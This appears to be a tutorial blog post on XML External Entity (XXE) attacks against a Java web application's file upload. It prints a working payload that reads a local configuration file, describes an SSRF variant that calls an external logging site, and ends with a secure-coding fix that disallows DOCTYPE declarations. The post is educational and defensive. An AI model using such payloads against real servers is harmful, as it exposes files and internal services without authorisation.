Today let us check out how XML file is being processed in java web application and how a malicious input will make an impact on the web application and underlying server due to an insecure XML file parsing process.
As most of the penetration testers know what is XXE attack, I would like to talk about how an insecure coding leads to the attack rather than explaining what is XXE attack. If you would like to learn what is the XXE attack, please check out the below links.
I have implemented the basic XXE attack with a java web application. When I upload the valid XML file, the application shows the data from the uploaded file to the user.
I have created an HTML file for file upload.
Below is the java code for processing and displaying the content of the XML file to the user. I have provided comments for each line to explain the purpose of the code.
Now, let us see how this application behaves for different input.
Scenario:1
A valid XML file is given.
Let us launch the application.
Now, the result is shown in the application.
Scenario:2
Let us try to upload an invalid XML file. The extension of the file is “.xml.sql”.Since the invalid filename is given the application will not process it and will throw an exception to the user.
The result is shown below. An exception is displayed by the application.
Attack Scenario:
In order to perform the XXE attack, we need to define the payload properly. One can achieve multiple attack scenarios via XXE based on the application’s behavior. I have tried to access the sensitive file information from the application.
In normal cases, most of the applications will be deployed in Linux based machines in order for quick processing. However, in this scenario, the application has been deployed on my local machine to stimulate the attack. I have planned to access the sensitive file stored in my local.
Below is the payload and it is embedded in the valid XML file
<?xml version=”1.0" encoding=”ISO-8859–1"?>
<!DOCTYPE example [
<!ELEMENT example ANY >
<!ENTITY file SYSTEM “file:///G:/Java_learning/Files/application.conf” >
]>
Let us see how the application behaves with malicious input.
The attacker is able to access the configuration file which is located in the application machine and is able to access that successfully.
As shown above, if an attacker finds the vulnerable application endpoint in any application, he/she will be able to achieve any sort of malicious activity based on the need.
Scenario:2
I am able to make a request to an external server and this leads SSRF attack as well.SSRF attack will lead to any sort of code execution in the vulnerable application server. Below is the payload given in the XML file
webhook.site is used here to check whether a vulnerable application is making a request to the external server.
Now, let us see the result. The employee's last name is shown empty. However, the request is made from the vulnerable machine to the external site “webhook.site”
We can see that the request is made recently and host details shows where the actual request is originated from.
Secure coding:
The best way to prevent XXE attacks is to disable the parsing of any Document Type Declarations (DTDs) in untrusted data. If this is not possible you should disable the parsing of external general entities and external parameter entities.
Let us try to add the below code to disable the DTD declaration.
dbf.setFeature(“http://apache.org/xml/features/disallow-doctype-decl", true);
Attack Scenario:3
let us try to upload the same malicious file this time and check how the application reacts to the malicious code.
The application is throwing an exception stating that DOCTYPE is disallowed in the XML file. Thus, the attacker is unable to execute his/her code in the application.
I hope the demonstration has given you a glimpse of how XXE attack occurs and how to prevent them. The prevention method varies based on application design and implementation. The developer and security team need to discuss such vulnerability during the designing phase and try to prevent them during the coding phase.
Please support and share if you like this post.
If you like the content, please follow me on medium and LinkedIn
LinkedIn: https://www.linkedin.com/in/pravin-r-p-oscp-28497712b/
